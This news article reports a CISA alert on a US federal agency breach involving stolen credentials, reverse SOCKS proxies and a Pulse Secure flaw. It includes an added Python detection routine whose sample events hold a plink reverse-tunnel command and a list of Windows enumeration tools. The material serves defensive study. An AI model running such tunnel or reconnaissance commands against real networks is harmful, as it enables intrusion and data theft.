A warning has been issued by America's Cybersecurity and Infrastructure Security Agency (CISA) after a malicious cyber-actor compromised a United States federal agency.
The attacker used valid log-in credentials for multiple users’ Microsoft Office 365 accounts and domain administrator accounts to gain access to the agency's enterprise network. Once inside, the bad actor infected the network with sophisticated malware.
"By leveraging compromised credentials, the cyber threat actor implanted sophisticated malware—including multi-stage malware that evaded the affected agency’s anti-malware protection—and gained persistent access through two reverse Socket Secure (SOCKS) proxies that exploited weaknesses in the agency’s firewall," said CISA in a statement released yesterday.
CISA was alerted to a potential compromise of a federal agency's network via EINSTEIN, an intrusion detection system that monitors federal civilian networks.
Malicious activity was confirmed during an investigation launched by CISA in conjunction with the affected agency.
Investigators found the threat actor logged into a user's Office 365 account remotely, then browsed pages on a SharePoint site and downloaded a file. The threat actor then connected multiple times by Transmission Control Protocol to the victim organization’s virtual private network (VPN) server.
“Immediately afterward, the threat actor used common Microsoft Windows command line processes—conhost, ipconfig, net, query, netstat, ping and whoami, plink.exe—to enumerate the compromised system and network,” stated CISA.
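As an added detection example (not code from CISA or the article), the routine below scans constructed Windows process-creation events for the two behaviours described here: plink.exe launched with a reverse-tunnel flag, and a burst of the listed enumeration commands from one host/user session. Field layout, timestamps and thresholds are assumed.

```python
# Added example: flag enumeration bursts and plink reverse tunnels in
# process-creation telemetry. Event tuples and thresholds are assumptions.
from collections import defaultdict
from datetime import datetime, timedelta

# Enumeration tools named in the advisory. conhost.exe is omitted because it
# is spawned for every console process and would only add noise.
ENUM_COMMANDS = {"ipconfig.exe", "net.exe", "query.exe",
                 "netstat.exe", "ping.exe", "whoami.exe"}

# Constructed sample events: (timestamp, host, user, image, command line)
SAMPLE_EVENTS = [
    ("2020-09-01T10:00:05", "WS01", "jdoe", "whoami.exe", "whoami /all"),
    ("2020-09-01T10:00:09", "WS01", "jdoe", "ipconfig.exe", "ipconfig /all"),
    ("2020-09-01T10:00:14", "WS01", "jdoe", "net.exe", "net group /domain"),
    ("2020-09-01T10:00:20", "WS01", "jdoe", "netstat.exe", "netstat -ano"),
    ("2020-09-01T10:00:31", "WS01", "jdoe", "query.exe", "query user"),
    ("2020-09-01T10:02:00", "WS01", "jdoe", "plink.exe",
     "plink.exe -N -R 8080:127.0.0.1:8080 user@203.0.113.5"),
    ("2020-09-01T11:30:00", "WS02", "asmith", "ping.exe", "ping fileserver"),
]

def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")

def detect_reverse_tunnels(events):
    """plink.exe with -R opens a tunnel from the remote host back into the
    network, which is how a reverse SOCKS proxy is typically set up."""
    return [(host, user, cmd) for _, host, user, image, cmd in events
            if image.lower() == "plink.exe" and "-R" in cmd.split()]

def detect_enum_bursts(events, window=timedelta(minutes=2), min_distinct=4):
    """Flag (host, user) pairs running at least min_distinct different
    enumeration tools inside one sliding window."""
    per_session = defaultdict(list)
    for ts, host, user, image, _ in events:
        if image.lower() in ENUM_COMMANDS:
            per_session[(host, user)].append((parse(ts), image.lower()))
    alerts = []
    for (host, user), items in per_session.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            seen = {img for t, img in items[i:] if t - start <= window}
            if len(seen) >= min_distinct:
                alerts.append((host, user, sorted(seen)))
                break  # one alert per session is enough
    return alerts
```

The thresholds are deliberately conservative; a single whoami or ipconfig is routine, while several distinct tools within two minutes from the same session rarely is.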
The cyber-criminal copied files and exfiltrated the data via a Microsoft Windows Terminal Services client. The intruder also created a backdoor, indicating that further attacks were planned.
CISA analysts were not able to determine how the cyber threat actor initially obtained the credentials used in the attack; however, they did come up with a theory involving Pulse Secure.
"It is possible the cyber actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability—CVE-2019-11510—in Pulse Secure," stated CISA, adding that it "has observed wide exploitation of CVE-2019-11510 across the federal government."
The vulnerability allows the remote, unauthenticated retrieval of files, including passwords. Patches were released by Pulse Secure in April 2019 for several critical vulnerabilities, including CVE-2019-11510.
No details of when the attack took place or which agency was compromised have been released.